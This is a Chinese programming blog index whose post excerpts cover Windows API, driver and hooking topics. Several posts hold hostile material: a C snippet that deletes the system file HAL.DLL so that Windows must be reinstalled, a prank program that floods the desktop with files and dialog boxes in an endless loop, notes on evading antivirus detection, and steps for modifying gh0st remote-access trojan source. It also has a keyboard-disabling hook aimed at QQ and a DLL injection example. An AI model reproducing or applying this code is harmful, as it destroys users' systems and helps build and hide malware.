- 博客(31)
- 收藏
- 关注
RSS订阅原创 我了个草
写的一个系统安全优化工具,写到删除系统垃圾的时候,不知道哪里出问题了,把系统的HAL文件给删了,然后重装系统,用一张英文版XP光盘装,准备格式C盘的时候想了想,还是用WIN7的盘吧,因为英文版还要下各种驱动,所以嫌麻烦,只是把C盘分区删除了还没有格式化就把盘退出来了,然后用WIN7的盘,一键安装,到这里,我了个草,就是因为前面没有格式化C盘导致的,安装完成后,开机启动不了,然后才发现,TMD安装到
2013-06-21 20:23:11
868
原创 MessageBox shellcode
最近在学习shellcode ,一个XPSP3下的MessageBox shellcode 。先把代码贴出来吧。char shellcode[]="\x6A\x00\x6A\x00\x6A\x00\x6A\x00\xB8\xEA\x07\xD5\x77\xFF\xD0";void *zhizhen = &shellcode;_asm{call zhizhen}s
2013-06-18 19:49:20
1442
原创 system()函数小技巧
system()可以调用dos下的命令,但有时候碰到双引号的语句,导致编译不通过。如:system(" xxx "DCOM Protocols" xxxx");可以改为:system(" xxx \"DCOM Protocols\" xxxx");加上\号就可以了。
2013-06-05 11:42:14
930
原创 VC取得环境变量内容
头文件:#include 定义函数:char * getenv(const char *name);函数说明:getenv()用来取得参数name 环境变量的内容. 参数name 为环境变量的名称, 如果该变量存在则会返回指向该内容的指针. 环境变量的格式为name=value.返回值:执行成功则返回指向该内容的指针, 找不到符合的环境变量名称则返回
2013-05-27 22:52:38
1225
原创 写的一个东东
// freeheart.cpp : Defines the entry point for the console application.//学习交流使用,违法使用后果自负。// by:freeheart time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i // argv 2 = name.exe// argv 3 = 1
2013-05-27 22:50:21
636
原创 GetModuleFileName函数
WINAPI DWORD GetModuleFileName( HMODULE hModule,LPWSTR lpFilename, DWORD nSize);hModule Long一个模块的句柄。可以是一个DLL模块,或者是一个应用程序的实例句柄。如果该参数为NULL,该函数返回该应用程序全路径。lpFileName String指定一个字串缓冲区,要在其中
2013-05-23 01:06:57
574
原创 谈学习,难,逃避
摘自:李中莹微博谈"学习"之一:我们需要不断学习,与时俱进,但是,学什么?应试教育只强调知识,欠缺能力的培养,就是道理很好,只是做不出来。去买一台冼衣机,说明书有完整的知识,而那台机器不说只做,就是能力。二者选一,你要哪个?这就是应届大学生的困难所在。(待续)谈学习之二:我们的传统文化很优秀深厚,"应该怎样做"的学问很丰富,"如何能做到"的学问,就是现代人说的"操作性强"的
2013-05-19 00:48:18
698
原创 argc和argv的解释
平时定义主函数时通常的写法为:int main( )或void main( )int main( ) 只是 UNIX 及 Linux 默许的用法,main(int argc, char *argv[ ])才是UNIX和Linux中的标准写法。argc是参数个数argv是字符串数组,存参数的地方,如编译好的程序为1.exe在命令行执行 1.exe 1 2 3
2013-05-18 21:38:09
895
原创 文件读取写入
#include "stdafx.h"#include //必要头文件#include //必要头文件#include using namespace std;int main(int argc, char* argv[]){ ifstream duqu("11.cpp"); //调用类,读取功能 ofstream xieru("C:\\1.txt");
2013-05-18 17:02:28
627
原创 VS2008编译驱动
一、新建一个空的 win32控制台程序 1、选(文件→新建→项目→Visual C++项目→win32→win32控制台项目)创建一个填写上名称event然后按确定在弹出的win32应用程序向导里 选应用程序设置 →附加选项 勾选空项目→完成。二 选项目菜单→添加现有项→添加所有驱动相关的*.h,*.c,*.cpp,*.rc之类的文件。三
2013-05-17 21:14:28
538
原创 VC6.0工具栏没有了的办法
英文版:Tools->Customize->Toolbars->选中“Controls”中文版:工具->自定义->工具栏->选中“控件”
2013-05-17 21:12:24
5285
转载 Hiew使用方法
一、Hiew的运行 在Hiew目录找到Hiew.exe,运行它,这时Hiew界面出现的是Hiew目录文件。此时在屏幕底部的命令行有相关提示,对应的是功能键F(n),F1 帮助F2 - Hidden - 打开或关闭隐藏文件显示F3 - Name - 按文件排序F4 - Exten - 按扩展名排序F5 - Time - 按文件时间排序F6 - Size
2013-05-17 21:11:09
3019
原创 MmGetSystemRoutineAddress函数
PVOID MmGetSystemRoutineAddress( IN PUNICODE_STRING SystemRoutineName ); 获取内核导出函数的地址SystemRoutineName 为一个UNICODE字符串如:RtlInitUnicodeString(&Old_NtOpenProcess,L"NtOpenProce
2013-05-14 19:17:52
1685
原创 读取SSDT当前函数地址
#include "ntddk.h"VOID DriverUnload(PDRIVER_OBJECT driver){ DbgPrint("卸载成功\n\r");}typedef struct _ServiceDescriptorTable { PVOID ServiceTableBase; PVOID ServiceCounterTable; unsigned int Nu
2013-05-14 17:12:28
800
原创 dll注入目标进程
DLL 利用MFC创建,def文件中加入函数名,在cpp文件中写入自己的函数代码。在EXE源文件中加入两句代码。#pragma comment(lib,"dll.lib"); __declspec( dllimport ) void goHook();然后调用函数即可。以下安装钩子让QQ2013键盘失效HHOOK aHook;LRESULT CALLBA
2013-05-11 12:10:50
641
原创 CreateRemoteThread函数
这个函数可以实现远程CALL的功能。函数原型:HANDLE WINAPI CreateRemoteThread( __in HANDLE hProcess, //OpenProcess的返回值 __in LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T
2013-05-04 03:29:40
547
原创 植物大战僵尸中文版修改器源码
很简单一个辅助,关键是游戏数据的分析,实现了两个功能,无限阳光和无冷却。特别注意的一下,如果用VS2008编译的话,调试的时候是正常的,但编译后功能就会失效,这是因为OpenProcess权限的问题,需要提权,在VC6下是正常的。void CzhiwuDlg::OnBnClickedButton1(){ //无限阳光代码 HWND hJubing; DWORD lID; DWOR
2013-05-01 18:45:56
4047
原创 Winsock编程
加载必要文件:winsock2.h#pragma comment(lib,"ws2_32.lib")初始化版本:WSAStarup()建立套字节:socket()绑定IP和端口:bind()监听:listen()等待连接:accept()接受信息:recv()发送信息:send()关闭套字节:
2013-05-01 15:11:42
385
原创 Hook
//全局HOOK钩子例子。HHOOK MyHook = NULL;LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam){ return 1; //返回非0,让键盘失效。}AAA_API BOOL StartHook(void){MyHook = SetWindowsHookEx(WH_KEYBO
2013-05-01 15:00:58
429
原创 ShellExeCute函数
HINSTANCE ShellExecute( HWND hwnd,LPCTSTR lpOperation,LPCTSTR lpFile,LPCTSTR lpParameters,LPCTSTR lpDirectory,INT nShowCmd);第一个参数是个句柄。第二个参数是打开的方式,如"open".第三个参数是打开的地址,如:"htt
2013-04-18 21:39:32
469
原创 几个函数的学习
FindWindowGetWindowThreadProcessIdOpenProcessOpenProcessReadProcessMemory函数原型:HWND FindWindow( LPCTSTR lpClassName, //窗口类名,可为NULL.LPCTSTR lpWindowName //窗口标题);DWORD GetWindo
2013-04-12 19:51:45
422
原创 内核双机调试
BOOT.ini 修改的:[boot loader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS[operating systems]multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /n
2013-03-30 20:00:04
517
原创 邪恶妙用DeleteFile函数
#include int main(){DeleteFile("C:\\WINDOWS\\SYSTEM32\\HAL.DLL");return 0;}HAL.DLL 系统文件,删除后需重装系统,学习交流,谨慎使用后果自负。
2013-02-07 09:11:54
740
转载 怎样练习一万个小时
来源:果壳网随着畅销书《异类》的流行,“练习一万小时成天才”这个口号现在是尽人皆知。也许仍然有不少人相信那些不世出的天才必有天生的神秘能力,但科学家通过大量的调查研究已经达成共识,那就是所有顶级高手都是练出来的。不但如此,最近几年的科学进展,人们可能第一次拥有了一个关于怎样炼成天才的统一理论。好消息是除了某些体育项目对天生的身高和体型有特殊要求之外,神秘的天生素质并不存在,也就是说
2013-01-24 19:53:01
340
原创 让对方崩溃的小程序
写的一个整人程序,运行程序后,程序会在桌面上创建N个文件,然后弹出N个对话框,进入个死循环。#include #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) //隐藏DOS窗口int main(){ char name[255];for(int z=0;z<=100000000
2013-01-24 19:31:23
1565
1
原创 源码免杀笔记
各个杀毒软件查杀特点不一样,大致总结以下,API函数,字符串,代码段,资源段。免杀方法大致有如下几种手段,动态函数调用,延迟加载DLL,合并区段,字符串隐藏,删版权换版权,花指令,反调试等等细节,以上几种方法基本上过掉大部分杀软,当然有能力也可以自己改变程序的代码实现原来的功能。1.动态函数调用有两个函数是不能调用的,GetProcAddress,LoadLibrary。杀毒软件如果查
2013-01-02 17:22:06
2128
转载 gh0st完全分离dat文件与dll文件
1.搜索IDR_DLL搜索IDR_BSS注释://IDR_BSS BSS DISCARDABLE "res\\install.exe"//IDR_BSS BSS DISCARDABLE "res\\install.exe"2.搜索ReleaseResource搜索
2013-01-02 17:17:56
846
转载 gh0st源码去硬盘锁与驱动
去硬盘锁:1.打开源文件gh0st.cpp(搜索unsigned char scode[] =)注释以下部分:/* unsigned char scode[] = "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" "\x00\xba\x1d\x0e\xcd\x10\xe2\
2012-12-13 13:15:19
938
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人